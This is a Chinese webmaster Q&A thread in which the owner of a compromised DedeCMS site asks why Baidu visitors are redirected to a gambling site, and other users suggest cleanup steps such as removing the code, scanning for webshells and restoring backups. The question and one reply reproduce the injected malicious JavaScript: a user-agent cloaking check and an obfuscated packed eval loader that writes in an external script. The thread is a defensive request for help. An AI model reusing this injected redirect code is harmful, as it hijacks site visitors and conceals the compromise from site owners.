搜外网>搜外问答>问答页面

网站被挂马了 求大佬看下应该怎么解决 谢谢谢谢 推荐热议 悬赏3元 已结束

微信

织梦程序做的站 最新版的织梦 该打的补丁也打了。 360网站安全检测也没问题全绿

现在情况是一到晚上  百度搜索点击网站打开直接跳转到一个菠菜网站。但是我直接输入域名的话没事。 我在后台更新下主页 这个问题就没了。。

我也查了网站程序文件 近期修改的文件 有几个疑似冰毒文件PHP后缀的我也删掉了 但是现在还是反复出现跳转页面。。

右键查看源代码  头部多了以下木马代码:(但是我查源码里面又没有这些网页上多出来的代码。)

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="智能中国网_国内领先的AI智能科技门户"}</script>

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\n\\b\\1\\e\\j\\7\\o\\0"]["\\l\\3\\8\\0\\7"](\'\\i\\2\\1\\3\\8\\4\\0 \\0\\k\\4\\7\\d\\6\\0\\7\\s\\0\\5\\f\\c\\t\\c\\2\\1\\3\\8\\4\\0\\6 \\2\\3\\1\\d\\6\\9\\0\\0\\4\\2\\p\\5\\5\\2\\a\\9\\e\\a\\9\\r\\g\\1\\b\\j\\5\\k\\q\\1\\g\\f\\2\\6\\h\\i\\5\\2\\1\\3\\8\\4\\0\\h\');',30,30,'x74|x63|x73|x72|x70|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6a|x2e|x3e|x3c|x6d|x79|x77|window|x64|x6e|x3a|x6c|x32|x78|x76'.split('|'),0,{}))

</script> 

这应该是XSS攻击   我同一个服务器上放了10个站 有6个出现这种一样的情况  这是服务器被挂马还是网站挂马?求大佬告诉怎么解决 

追加问题
网站安全 网站程序 PHP 代码 举报 本帖由用户发布,如有侵权联系删除  2019-07-25 发布1,676 次浏览
最新问题
广告位出租
广告位出租-排名优化
    10 人参与回答
校园
校园 · 在线接单QQ:775574311
翻历史 等 1 人赞同该回答

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?(c+29):(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\n\\b\\1\\e\\j\\7\\o\\0"]["\\l\\3\\8\\0\\7"](\'\\i\\2\\1\\3\\8\\4\\0 \\0\\k\\4\\7\\d\\6\\0\\7\\s\\0\\5\\f\\c\\t\\c\\2\\1\\3\\8\\4\\0\\6 \\2\\3\\1\\d\\6\\9\\0\\0\\4\\2\\p\\5\\5\\2\\a\\9\\e\\a\\9\\r\\g\\1\\b\\j\\5\\k\\q\\1\\g\\f\\2\\6\\h\\i\\5\\2\\1\\3\\8\\4\\0\\h\');',30,30,'x74|x63|x73|x72|x70|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6a|x2e|x3e|x3c|x6d|x79|x77|window|x64|x6e|x3a|x6c|x32|x78|x76'.split('|'),0,{}))

</script> 

这段代码是加密后的JS代码

< script type = "text/javascript" > window["document"]["write"]('<script type="text/javascript" src=""></script>'); < /script>这是解密后的代码,你把这代码删掉,你的网站应该也被留有后门了,用D盾可以查一下后门,然后在查找下文件的修改日期看一下,找出来哪些D盾查不到的文件,请给最佳谢谢

5 年前
IP属地:浙江
赞同 1 评论 4
收藏 举报
评论取消
So:Lo
So:Lo · 想看影视电影的可以访问我的网站

首先要做的是先不让网站跳转,登陆你的网站根目录找到index这个文件 找出你这段木马代码删除掉 

5 年前
IP属地:湖北
赞同 0 评论 1
收藏 举报
评论取消
梦

对于代码不是很懂,只能路过看看

5 年前
IP属地:上海
赞同 0 评论 0
收藏 举报
评论取消
浮生若梦终成空
浮生若梦终 · 一个做网络营销的闲人

这是你那一大堆解密之后的,后边的应该懂得噻

< script type = "text/javascript" > window["document"]["write"]('<script type="text/javascript" src=""></script>'); < /script>

5 年前
IP属地:四川
赞同 0 评论 0
收藏 举报
评论取消
遇见
遇见 · 铝镁锰板

如果解决不了,可以加我Q,看头像右边

5 年前
IP属地:安徽
赞同 0 评论 0
收藏 举报
评论取消
一枚谷歌优化师
一枚谷歌优 · 气体灭火

学习一下。还是摸不懂代码问题。

5 年前
IP属地:北京
赞同 0 评论 0
收藏 举报
评论取消

匿名用户

如果自己不会就去淘宝找技术解决

5 年前
IP属地:北京
赞同 0 评论 0
收藏 举报
评论取消
兜来兜去
兜来兜去 · php+mysql+web前端+小程序+微信公众号+app

把网站代码打包到本地,用D盾扫描检测下有没有webshell后门和木马之后 ,有则对应修改。之后更新快照。服务器不想花钱可以安装一个安全狗

5 年前
IP属地:浙江
赞同 0 评论 0
收藏 举报
评论取消
施先生
施先生 · 资深的SEO/SEM工作者和管理者

你FTP的服务器供应商有没有给你备份~有备份的话可以覆盖替换,如果没的话,就先备份个源文件,然后对有怀疑的代码区进行删除~这个会比较耗时间。

5 年前
IP属地:上海
赞同 0 评论 0
收藏 举报
评论取消
崔家大院
崔家大院 · 网站诊断、建站、快速排名

删除掉这些 代码  然后 在看看根目录里面的 有什么新文件 删除 在安全一个护卫神保护

5 年前
IP属地:北京
赞同 0 评论 0
收藏 举报
评论取消
搜外微信
提供服务
常用链接
产品实验室
©2008-2024 SEOWHY 深圳市夫唯伙伴信息咨询有限公司